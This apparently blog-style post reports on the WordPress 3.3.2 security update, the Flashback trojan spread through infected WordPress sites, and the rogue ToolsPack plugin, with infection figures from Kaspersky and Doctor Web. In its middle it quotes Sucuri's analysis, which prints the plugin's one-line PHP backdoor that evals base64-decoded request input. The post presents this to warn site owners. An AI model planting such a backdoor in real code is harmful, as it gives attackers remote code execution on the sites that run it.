WordPress have released an update (version 3.3.2) to address vulnerabilities in the previous version. The updates will update three external libraries as well as addressing cross scripting exploits:
- Plupload (version 1.5.4), which WordPress uses for uploading media.
- SWFUpload, which WordPress previously used for uploading media, and may still be in use by plugins.
- SWFObject, which WordPress previously used to embed Flash content, and may still be in use by plugins and themes.
WordPress 3.3.2 also addresses:
- Limited privilege escalation where a site administrator could deactivate network-wide plugins when running a WordPress network under particular circumstances.
- Cross-site scripting vulnerability when making URLs clickable.
- Cross-site scripting vulnerabilities in redirects after posting comments in older browsers, and when filtering URLs.
WordPress made no mention on the official release page as to whether this was released specifically to deal with the Mac Flashfake/ Flashback Trojan that was spread via infected WordPress blogs.
According to WebSense (via MacWorld UK) up to 100,000 WordPress sites were infected (85% being in the US)
Some of the sites used to host the attack could have become infected after naïve admins installed a rogue WordPress utility, ToolsPack. This inserted a simple script on the site capable of redirecting vulnerable users to a malware host.
Kaspersky reports that 205,622 Mac users have checked for infection on the flashbackcheck.com website it set up, with 3,624 of these turning out to be infected, a malware rate under 2 percent. The overall infection numbers have declined rapidly since last week.
“Apple is not used to reacting to these kinds of attack,” said Kaspersky researcher, Vincente Diaz.
The company was in the habit of writing its own patches for Java vulnerabilities instead of simply applying those coming from Java overseer, Oracle. In the case of Flashback, this had introduced delays to those patches being applied, he said.
“Mac OS invulnerability is a myth.”
Kaspersky have a very detailed look at the infections anatomy and how it was spread
If you manage your own WordPress installation then it is advised that you update to the latest version of WordPress 3.3.2 immediately. If you have also installed the ToolsPack plugin you should remove it.
On February 14 2012, Sucuri wrote about the plugin, ToolsPack which according to the author will “Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!”
Sucuri took a closer look at the plugin code
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Author: Mark Stain
Author URI: http://checkWPTools.com/
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
They also stated:
If you are not familiar with PHP, this is just a backdoor that allows attackers to execute any code on your site. If you see this plugin installed on your system, remove it right away!
How this plugin got in there is a different question. On some of compromised websites we noticed it implemented via wp-admin (so stolen passwords), and on others it is being installed via another backdoor.
Removing this plugin will not likely solve your security issues. You have to do a full review of the website – check all your files, update WordPress, change passwords, etc.
Doctor Web said that the process of eliminating Flashback from Macs is proceeding much slower than expected: On Friday, the Russian firm released new data showing that 566,000 active infected machines were counted Thursday and 610,000 counted Wednesday. (See chart below.)